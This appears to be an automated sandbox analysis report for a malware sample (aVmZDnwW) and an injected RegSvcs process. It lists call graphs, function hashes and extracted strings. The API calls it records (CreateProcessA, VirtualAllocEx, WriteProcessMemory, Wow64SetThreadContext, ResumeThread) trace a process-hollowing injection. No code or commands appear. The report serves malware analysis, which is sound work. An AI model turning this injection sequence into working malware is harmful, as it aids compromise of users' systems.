23758 9db9cfe 2 API calls 23756->23758 23759 9db91d6 23756->23759 23760 9db9713 8 API calls 23756->23760 23761 9db95f2 2 API calls 23756->23761 23762 9db98d2 2 API calls 23756->23762 23763 9db9851 2 API calls 23756->23763 23764 9db9649 6 API calls 23756->23764 23765 9db992d 2 API calls 23756->23765 23766 9db982c 2 API calls 23756->23766 23767 9db9ac3 2 API calls 23756->23767 23768 9db9a22 6 API calls 23756->23768 23769 9db9881 6 API calls 23756->23769 23770 9db97a1 2 API calls 23756->23770 23771 9db96e0 6 API calls 23756->23771 23772 9db9f67 2 API calls 23756->23772 23773 9db9666 6 API calls 23756->23773 23757->23759 23758->23759 23759->23731 23760->23759 23761->23759 23762->23759 23763->23759 23764->23759 23765->23759 23766->23759 23767->23759 23768->23759 23769->23759 23770->23759 23771->23759 23772->23759 23773->23759 23775 9db91b2 23774->23775 23776 9db91d6 23775->23776 23777 9db97da 2 API calls 23775->23777 23778 9db9cfe 2 API calls 23775->23778 23779 9db9713 8 API calls 23775->23779 23780 9db95f2 2 API calls 23775->23780 23781 9db98d2 2 API calls 23775->23781 23782 9db9851 2 API calls 23775->23782 23783 9db9649 6 API calls 23775->23783 23784 9db992d 2 API calls 23775->23784 23785 9db982c 2 API calls 23775->23785 23786 9db9ac3 2 API calls 23775->23786 23787 9db9a22 6 API calls 23775->23787 23788 9db9881 6 API calls 23775->23788 23789 9db97a1 2 API calls 23775->23789 23790 9db96e0 6 API calls 23775->23790 23791 9db9f67 2 API calls 23775->23791 23792 9db9666 6 API calls 23775->23792 23776->23731 23777->23776 23778->23776 23779->23776 23780->23776 23781->23776 23782->23776 23783->23776 23784->23776 23785->23776 23786->23776 23787->23776 23788->23776 23789->23776 23790->23776 23791->23776 23792->23776 23794 9db9857 23793->23794 23921 9db6388 23794->23921 23925 9db6380 23794->23925 23795 9db9fa8 23929 9db6af8 23798->23929 23933 9db6af0 23798->23933 23799 9db9900 23799->23740 23937 9db6e80 23802->23937 23941 9db6e76 23802->23941 23953 9db6c48 23806->23953 23957 
9db6c50 23806->23957 23807 9db964d 23807->23740 23808 9db9e60 23807->23808 23809 9db9d15 23807->23809 23810 9db9868 23807->23810 23945 9db68a8 23807->23945 23949 9db68b0 23807->23949 23808->23740 23815 9db6af8 WriteProcessMemory 23809->23815 23816 9db6af0 WriteProcessMemory 23809->23816 23819 9db6388 ResumeThread 23810->23819 23820 9db6380 ResumeThread 23810->23820 23811 9db9d36 23812 9db9fa8 23815->23811 23816->23811 23819->23812 23820->23812 23822 9db9d04 23821->23822 23824 9db6af8 WriteProcessMemory 23822->23824 23825 9db6af0 WriteProcessMemory 23822->23825 23823 9db9d36 23824->23823 23825->23823 23828 9db68a8 Wow64SetThreadContext 23826->23828 23829 9db68b0 Wow64SetThreadContext 23826->23829 23827 9db97f4 23827->23740 23828->23827 23829->23827 23841 9db68a8 Wow64SetThreadContext 23830->23841 23842 9db68b0 Wow64SetThreadContext 23830->23842 23831 9db9868 23837 9db6388 ResumeThread 23831->23837 23838 9db6380 ResumeThread 23831->23838 23832 9db9fa8 23833 9db9d15 23839 9db6af8 WriteProcessMemory 23833->23839 23840 9db6af0 WriteProcessMemory 23833->23840 23834 9db964d 23834->23740 23834->23830 23834->23831 23834->23833 23836 9db9e60 23834->23836 23835 9db9d36 23836->23740 23837->23832 23838->23832 23839->23835 23840->23835 23841->23834 23842->23834 23844 9db9f6d 23843->23844 23846 9db6388 ResumeThread 23844->23846 23847 9db6380 ResumeThread 23844->23847 23845 9db9fa8 23846->23845 23847->23845 23849 9db964d 23848->23849 23849->23740 23850 9db9d15 23849->23850 23851 9db9868 23849->23851 23854 9db9e60 23849->23854 23857 9db68a8 Wow64SetThreadContext 23849->23857 23858 9db68b0 Wow64SetThreadContext 23849->23858 23859 9db6af8 WriteProcessMemory 23850->23859 23860 9db6af0 WriteProcessMemory 23850->23860 23855 9db6388 ResumeThread 23851->23855 23856 9db6380 ResumeThread 23851->23856 23852 9db9d36 23853 9db9fa8 23853->23853 23854->23740 23855->23853 23856->23853 23857->23849 23858->23849 23859->23852 23860->23852 23862 9db97ae 23861->23862 23864 9db6af8 WriteProcessMemory 
23862->23864 23865 9db6af0 WriteProcessMemory 23862->23865 23863 9db9d8c 23864->23863 23865->23863 23869 9db964d 23866->23869 23867 9db9d15 23877 9db6af8 WriteProcessMemory 23867->23877 23878 9db6af0 WriteProcessMemory 23867->23878 23868 9db9d36 23869->23740 23869->23866 23869->23867 23870 9db9868 23869->23870 23871 9db9e60 23869->23871 23875 9db68a8 Wow64SetThreadContext 23869->23875 23876 9db68b0 Wow64SetThreadContext 23869->23876 23873 9db6388 ResumeThread 23870->23873 23874 9db6380 ResumeThread 23870->23874 23871->23740 23872 9db9fa8 23872->23872 23873->23872 23874->23872 23875->23869 23876->23869 23877->23868 23878->23868 23880 9db9a39 23879->23880 23885 9db964d 23879->23885 23880->23740 23881 9db9868 23887 9db6388 ResumeThread 23881->23887 23888 9db6380 ResumeThread 23881->23888 23882 9db9fa8 23883 9db9d15 23889 9db6af8 WriteProcessMemory 23883->23889 23890 9db6af0 WriteProcessMemory 23883->23890 23884 9db9d36 23885->23740 23885->23881 23885->23883 23886 9db9e60 23885->23886 23891 9db68a8 Wow64SetThreadContext 23885->23891 23892 9db68b0 Wow64SetThreadContext 23885->23892 23886->23740 23887->23882 23888->23882 23889->23884 23890->23884 23891->23885 23892->23885 23894 9db9ac7 23893->23894 23961 9db69d8 23894->23961 23965 9db69d0 23894->23965 23895 9db9ae5 23895->23740 23899 9db9ac7 23898->23899 23901 9db69d8 VirtualAllocEx 23899->23901 23902 9db69d0 VirtualAllocEx 23899->23902 23900 9db9ae5 23900->23740 23901->23900 23902->23900 23904 9db9947 23903->23904 23906 9db6388 ResumeThread 23904->23906 23907 9db6380 ResumeThread 23904->23907 23905 9db9fa8 23905->23905 23906->23905 23907->23905 23911 9db964d 23908->23911 23909 9db9d15 23919 9db6af8 WriteProcessMemory 23909->23919 23920 9db6af0 WriteProcessMemory 23909->23920 23910 9db9d36 23911->23740 23911->23909 23912 9db9868 23911->23912 23913 9db9e60 23911->23913 23917 9db68a8 Wow64SetThreadContext 23911->23917 23918 9db68b0 Wow64SetThreadContext 23911->23918 23915 9db6388 ResumeThread 23912->23915 23916 9db6380 
ResumeThread 23912->23916 23913->23740 23914 9db9fa8 23914->23914 23915->23914 23916->23914 23917->23911 23918->23911 23919->23910 23920->23910 23922 9db63cc ResumeThread 23921->23922 23924 9db6418 23922->23924 23924->23795 23926 9db63cc ResumeThread 23925->23926 23928 9db6418 23926->23928 23928->23795 23930 9db6b44 WriteProcessMemory 23929->23930 23932 9db6bdd 23930->23932 23932->23799 23934 9db6b44 WriteProcessMemory 23933->23934 23936 9db6bdd 23934->23936 23936->23799 23938 9db6f07 23937->23938 23938->23938 23939 9db70f2 CreateProcessA 23938->23939 23940 9db715c 23939->23940 23942 9db6f07 23941->23942 23942->23942 23943 9db70f2 CreateProcessA 23942->23943 23944 9db715c 23943->23944 23944->23944 23946 9db68b2 Wow64SetThreadContext 23945->23946 23948 9db6971 23946->23948 23948->23807 23950 9db68f9 Wow64SetThreadContext 23949->23950 23952 9db6971 23950->23952 23952->23807 23954 9db6c9c ReadProcessMemory 23953->23954 23956 9db6d14 23954->23956 23956->23807 23958 9db6c9c ReadProcessMemory 23957->23958 23960 9db6d14 23958->23960 23960->23807 23962 9db6a1c VirtualAllocEx 23961->23962 23964 9db6a94 23962->23964 23964->23895 23966 9db69da VirtualAllocEx 23965->23966 23968 9db6a94 23966->23968 23968->23895 23696 e08278 23697 e082c5 VirtualProtect 23696->23697 23698 e08331 23697->23698 23969 e00848 23970 e0085a 23969->23970 23973 e08379 23970->23973 23974 e083a4 23973->23974 23975 e00871 23974->23975 23978 e098d1 23974->23978 23982 e09908 23974->23982 23979 e098d4 23978->23979 23986 e0993f 23979->23986 23983 e0991f 23982->23983 23985 e0993f NtQueryInformationProcess 23983->23985 23984 e09933 23984->23974 23985->23984 23987 e09970 23986->23987 23991 e099b0 23987->23991 23995 e099a1 23987->23995 23988 e09933 23988->23974 23992 e099d4 23991->23992 23993 e09b08 23992->23993 23999 e007f4 23992->23999 23993->23988 23996 e099d4 23995->23996 23997 e09b08 23996->23997 23998 e007f4 NtQueryInformationProcess 23996->23998 23997->23988 23998->23996 24000 e09b70 
NtQueryInformationProcess 23999->24000 24002 e09c37 24000->24002 24002->23992 24003 9dba3f0 24004 9dba57b 24003->24004 24005 9dba416 24003->24005 24005->24004 24007 9db3598 24005->24007 24008 9dba6c8 PostMessageW 24007->24008 24009 9dba775 24008->24009 24009->24005
                                            APIs
                                            • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00E09C25
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2229308253.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_e00000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID:
                                            • API String ID: 1778838933-0
                                            • Opcode ID: 1cc7b9ae7571c3d73e320fe83571be53e7756ae2ceaf5dbb8f4e0aa61f4445e2
                                            • Instruction ID: 581e424568221f5f1005ef790c821c6e65ff204d138f8f13ee725a939a6ef591
                                            • Opcode Fuzzy Hash: 1cc7b9ae7571c3d73e320fe83571be53e7756ae2ceaf5dbb8f4e0aa61f4445e2
                                            • Instruction Fuzzy Hash: 3D4166B9D042589FCF10CFA9D984A9EFBF5BB59310F10A02AE814B7211D375A945CF64
                                            APIs
                                            • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00E09C25
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2229308253.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_e00000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID:
                                            • API String ID: 1778838933-0
                                            • Opcode ID: fc8633953aac238b85a46c9674fc609dd421fb82e447dd308c525800f24620d0
                                            • Instruction ID: f417ec784082654bc169069983dcabaef66edb6ecfed1c0211d8521c1ee7a05d
                                            • Opcode Fuzzy Hash: fc8633953aac238b85a46c9674fc609dd421fb82e447dd308c525800f24620d0
                                            • Instruction Fuzzy Hash: 9A3165B9D04258DFCF10CFA9D984A9EFBB1BB59310F24A02AE818B7311D335A945CF64

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 943 9db6e76-9db6f19 945 9db6f1b-9db6f32 943->945 946 9db6f62-9db6f8a 943->946 945->946 949 9db6f34-9db6f39 945->949 950 9db6f8c-9db6fa0 946->950 951 9db6fd0-9db7026 946->951 952 9db6f3b-9db6f45 949->952 953 9db6f5c-9db6f5f 949->953 950->951 958 9db6fa2-9db6fa7 950->958 960 9db7028-9db703c 951->960 961 9db706c-9db715a CreateProcessA 951->961 955 9db6f49-9db6f58 952->955 956 9db6f47 952->956 953->946 955->955 959 9db6f5a 955->959 956->955 962 9db6fca-9db6fcd 958->962 963 9db6fa9-9db6fb3 958->963 959->953 960->961 969 9db703e-9db7043 960->969 979 9db715c-9db7162 961->979 980 9db7163-9db7248 961->980 962->951 964 9db6fb7-9db6fc6 963->964 965 9db6fb5 963->965 964->964 968 9db6fc8 964->968 965->964 968->962 971 9db7066-9db7069 969->971 972 9db7045-9db704f 969->972 971->961 973 9db7053-9db7062 972->973 974 9db7051 972->974 973->973 975 9db7064 973->975 974->973 975->971 979->980 992 9db724a-9db724e 980->992 993 9db7258-9db725c 980->993 992->993 994 9db7250 992->994 995 9db725e-9db7262 993->995 996 9db726c-9db7270 993->996 994->993 995->996 997 9db7264 995->997 998 9db7272-9db7276 996->998 999 9db7280-9db7284 996->999 997->996 998->999 1002 9db7278 998->1002 1000 9db72ba-9db72c5 999->1000 1001 9db7286-9db72af 999->1001 1006 9db72c6 1000->1006 1001->1000 1002->999 1006->1006
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09DB7147
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9db0000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: f50c4fbd0210e86d66a3c62982b31096564cf2c67c2597270747a1deb2f964d5
                                            • Instruction ID: f77151abf10688cd8f3b446848e00776c7fe1253fa5ea5bd98629bebe9c40d3c
                                            • Opcode Fuzzy Hash: f50c4fbd0210e86d66a3c62982b31096564cf2c67c2597270747a1deb2f964d5
                                            • Instruction Fuzzy Hash: B7C10771D00219CFDF24CFA8C841BEDBBB1BB49314F0095A9E50ABB650DB749A85CF94
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09DB7147
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9db0000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 2ef77eb2a85028e4b8dd46cb10d86ca8e6726cfbd6d629a2d75db46f472878a5
                                            • Instruction ID: a306ea547921ab1cb5f8706c4002ad6227c3a586335e84c72493e6c9cf41a7c8
                                            • Opcode Fuzzy Hash: 2ef77eb2a85028e4b8dd46cb10d86ca8e6726cfbd6d629a2d75db46f472878a5
                                            • Instruction Fuzzy Hash: ECC10671D00219CFDF24CFA8C841BEDBBB1BB49314F0095A9E91ABB650DB749A85CF94
                                            APIs
                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 09A6279B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239066040.0000000009A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9a60000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: CreateFromIconResource
                                            • String ID:
                                            • API String ID: 3668623891-0
                                            • Opcode ID: ed54ccee5dabae695fbe1675b9fb8e63581ee30a18eac1c70d94b07c3bcc2111
                                            • Instruction ID: e76184c13746a0762a41c0840bab669879f620b85518756169509d3cc6dd50be
                                            • Opcode Fuzzy Hash: ed54ccee5dabae695fbe1675b9fb8e63581ee30a18eac1c70d94b07c3bcc2111
                                            • Instruction Fuzzy Hash: 6F51D2B5D042589FCF04CFA9D884AAEFBF4EF19310F14945AE814BB321D731A941CBA4
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239066040.0000000009A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9a60000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: CreateFromIconResource
                                            • String ID:
                                            • API String ID: 3668623891-0
                                            • Opcode ID: 4ef4f56399f4d02b6fd99df179204fd7471a18bb52cb6fa8de0a8625d5502f1b
                                            • Instruction ID: 71f4a9d4dac3f7e07c2bc1d2fec3867678767d1249a8d6cf7b8bd2904cbc8585
                                            • Opcode Fuzzy Hash: 4ef4f56399f4d02b6fd99df179204fd7471a18bb52cb6fa8de0a8625d5502f1b
                                            • Instruction Fuzzy Hash: 6651CDB5D042589FCF01CFA9D880A9EBFB5EF1A310F14906AE914BB221C335A941DF64
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00E0F739
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2229308253.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_e00000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: c407649a94aa264afd6d02d08ffe03fec8ae113ac0e073057556e204b99fcd33
                                            • Instruction ID: ce74c4cd699c933f957330be69629cf3f2ad0e7e252fcdfe2bd0ebee771b8070
                                            • Opcode Fuzzy Hash: c407649a94aa264afd6d02d08ffe03fec8ae113ac0e073057556e204b99fcd33
                                            • Instruction Fuzzy Hash: 1751C0B1D002189FDB21DFA9C840BDEBBF5AF49700F1084AAD509BB251DA716A89CF91
APIs
• CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 09A6279B
Memory Dump Source
• Source File: 00000008.00000002.2239066040.0000000009A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A60000, based on PE: false
APIs
• WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09DB6BCB
Memory Dump Source
• Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09DB6D02
Memory Dump Source
• Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09DB6A82
Memory Dump Source
• Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
APIs
• Wow64SetThreadContext.KERNEL32(?,?), ref: 09DB695F
Memory Dump Source
• Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 00E0831F
Memory Dump Source
• Source File: 00000008.00000002.2229308253.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
APIs
• PostMessageW.USER32(?,?,?,00000000), ref: 09DBA763
Memory Dump Source
• Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
APIs
• ResumeThread.KERNELBASE(?), ref: 09DB6406
Memory Dump Source
• Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                            • API String ID: 0-3391486992
                                            • Opcode ID: fdfaee8bb3c5af606d938d4e2aee4b078faa0b9a113d3dea6c4c29aec9a08c8d
                                            • Instruction ID: 448097a5f72bb9b38be6acb122bcf9aaa3276e4c057278f11e19b06660a3baad
                                            • Opcode Fuzzy Hash: fdfaee8bb3c5af606d938d4e2aee4b078faa0b9a113d3dea6c4c29aec9a08c8d
                                            • Instruction Fuzzy Hash: 14819274E01218DFDB54CFAAD984A9DBBF2BF89300F14C069E419AB265DB749981CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                            • API String ID: 0-3391486992
                                            • Opcode ID: 78da7d9a0e17399620e2307b0ea8144e695cf47aabd72083bdda83a70cae5e7a
                                            • Instruction ID: 97a8ff534ad0408601133964507cf74d2fbed2c480c647099c21e765ec0edaba
                                            • Opcode Fuzzy Hash: 78da7d9a0e17399620e2307b0ea8144e695cf47aabd72083bdda83a70cae5e7a
                                            • Instruction Fuzzy Hash: CF81C174E01208CFEB14DFAAD984A9DBBF6BF89300F14D069E419EB265DB349981CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                            • API String ID: 0-3391486992
                                            • Opcode ID: 48ab6652fb25d2be3628560267bf846e4245e1561abcbd29ccb3dd3a8994fd4d
                                            • Instruction ID: d5ec1db5e11ebb436c66a81a67accbece7bf86b671deb370092188b5e9f03f3f
                                            • Opcode Fuzzy Hash: 48ab6652fb25d2be3628560267bf846e4245e1561abcbd29ccb3dd3a8994fd4d
                                            • Instruction Fuzzy Hash: 7C81A274E01218DFDB54DFAAD884A9DBBF2BF89304F14C069E419AB365EB349981CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq$(ocq$,gq$,gq
                                            • API String ID: 0-2401767512
                                            • Opcode ID: eeb62a8cf144121a9b10bbcc59373cec661b2ba44f2ecf20725f14f77be6595e
                                            • Instruction ID: 0183d1501b7579424b295dd6d3c63aa2d92fb3efd07fa3486fbce7409a80bf1d
                                            • Opcode Fuzzy Hash: eeb62a8cf144121a9b10bbcc59373cec661b2ba44f2ecf20725f14f77be6595e
                                            • Instruction Fuzzy Hash: 5CD10971A01119EFCB54CFA9C9C4AADBBFAFF8A340F198055E405AB265D732E981CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$PHcq$PHcq
                                            • API String ID: 0-775545523
                                            • Opcode ID: b06f30e6a6c786d9574fe0cd80c0f70ad32b7776794eac4e99447353b4fb8d5a
                                            • Instruction ID: 684498acfc74664505009451a9aa53d4d2c366fb8380fc16e9401691eea325c2
                                            • Opcode Fuzzy Hash: b06f30e6a6c786d9574fe0cd80c0f70ad32b7776794eac4e99447353b4fb8d5a
                                            • Instruction Fuzzy Hash: E561A374E016089FDB14DFAAD984A9EBBF6FF89300F14C06AE419AB365DB345941CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq$4'cq
                                            • API String ID: 0-3004416391
                                            • Opcode ID: 04826264d3fc4634d5616f0a89db011a6b988cd71f18416e2275dc3569e37718
                                            • Instruction ID: 82df627b3db8b089a43fb3480a21bf35569f58d02268c9da8f20f41f360fb257
                                            • Opcode Fuzzy Hash: 04826264d3fc4634d5616f0a89db011a6b988cd71f18416e2275dc3569e37718
                                            • Instruction Fuzzy Hash: 9372A271B01609CFCB15CF68C984AAEBBFAFF8A310F158555E8459B3A5D770E881CB60
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq$Hgq
                                            • API String ID: 0-2239030825
                                            • Opcode ID: a45f4c7620e9cf5996da705ef37d972dcec976a06189c351c973b818b2739739
                                            • Instruction ID: 000d59d3a51b743c15a6369e8965cfea53ee2c3e142f262307044907e6e3c23e
                                            • Opcode Fuzzy Hash: a45f4c7620e9cf5996da705ef37d972dcec976a06189c351c973b818b2739739
                                            • Instruction Fuzzy Hash: A0129170A002199FCB18DF69C994BAEBBFAFF89300F148569E405DB395DB359D81CB90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq$(ocq$(ocq$(ocq$(ocq$(ocq$,gq$,gq
                                            • API String ID: 0-3338910979
                                            • Opcode ID: 70dcaca5624b4269e9900b61920204e7cb8fe0faf5fac527de2b247e4d401b14
                                            • Instruction ID: 43a26609f23ab93347449dd6692d046f593e98b8bb68122905be32d0fdbfa93e
                                            • Opcode Fuzzy Hash: 70dcaca5624b4269e9900b61920204e7cb8fe0faf5fac527de2b247e4d401b14
                                            • Instruction Fuzzy Hash: 79127B70A01609DFCB55CF69C884A9EBBFAFF8A710F158599E805DB261DB30ED40CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $cq$$cq
                                            • API String ID: 0-2695052418
                                            • Opcode ID: 651d89e6629435753711ee3a4d3bd7e3156ec8845dafb9e1b0ba323a6a3ea335
                                            • Instruction ID: 1dc85287c85515e9485c7b932919ea02a3489a23a97053d37129280a106a9c90
                                            • Opcode Fuzzy Hash: 651d89e6629435753711ee3a4d3bd7e3156ec8845dafb9e1b0ba323a6a3ea335
                                            • Instruction Fuzzy Hash: 0C525178A005198FEB55DFA5C850BAEBB72FF94300F5080AAC10A6B7A5CF389D85DF51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hgq$Hgq
                                            • API String ID: 0-3391890871
                                            • Opcode ID: 979cff5f712b8830ccffc67a9b155d6a7cf93543079f63b7e03bb62c62f74347
                                            • Instruction ID: d8995ab782ffeb1ad21bde3f2561d79a8a27e98b129c4e3e9593025410089876
                                            • Opcode Fuzzy Hash: 979cff5f712b8830ccffc67a9b155d6a7cf93543079f63b7e03bb62c62f74347
                                            • Instruction Fuzzy Hash: 2DB1CD717056158FDB15DF28D848B2E7BEAEF8B211F08886AE446CB3A5DB34CC41D7A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'cq$4'cq
                                            • API String ID: 0-60795322
                                            • Opcode ID: e3466ad053f3fa9dc362f1238acab875273f8bb37afaef8a2a336962b47dc38b
                                            • Instruction ID: d82094296a57d3b7e9cee69707deaac2e29d73c77f948eba380c2a33ac2feb68
                                            • Opcode Fuzzy Hash: e3466ad053f3fa9dc362f1238acab875273f8bb37afaef8a2a336962b47dc38b
                                            • Instruction Fuzzy Hash: DCB15D713165028FDB59DB29C958B3D76DEEF86600F1884EAF512CF3A1EA28CC898751
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,gq$,gq
                                            • API String ID: 0-2533611571
                                            • Opcode ID: 93ab38860c2e1338f0b145fac3701aac148fc8e771662beb7179da78d524597c
                                            • Instruction ID: 83c59a13475cb0aafa3fde93c0e7b9c05c9efb37da273ec1784d0868830bee15
                                            • Opcode Fuzzy Hash: 93ab38860c2e1338f0b145fac3701aac148fc8e771662beb7179da78d524597c
                                            • Instruction Fuzzy Hash: 4E819F35A025068FCB58DF69CC88A6EB7FAFF8B214B198569D406DB374D731E841CB90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Xgq$Xgq
                                            • API String ID: 0-2113765878
                                            • Opcode ID: 1d10faec3a237e318688c453c5d0528a99e057f0cfab5b21fa58d4014c20e8e2
                                            • Instruction ID: cc6e9b878d1eb6d250dfd409ece37d6afa7f198d5aff5dd417a075db397596a1
                                            • Opcode Fuzzy Hash: 1d10faec3a237e318688c453c5d0528a99e057f0cfab5b21fa58d4014c20e8e2
                                            • Instruction Fuzzy Hash: 79312779B023244BDF6ECA6A89D427EA9DEBFC6211F0844B9D806C7780DF74DC8447A1
                                            Strings
                                            Memory Dump Source
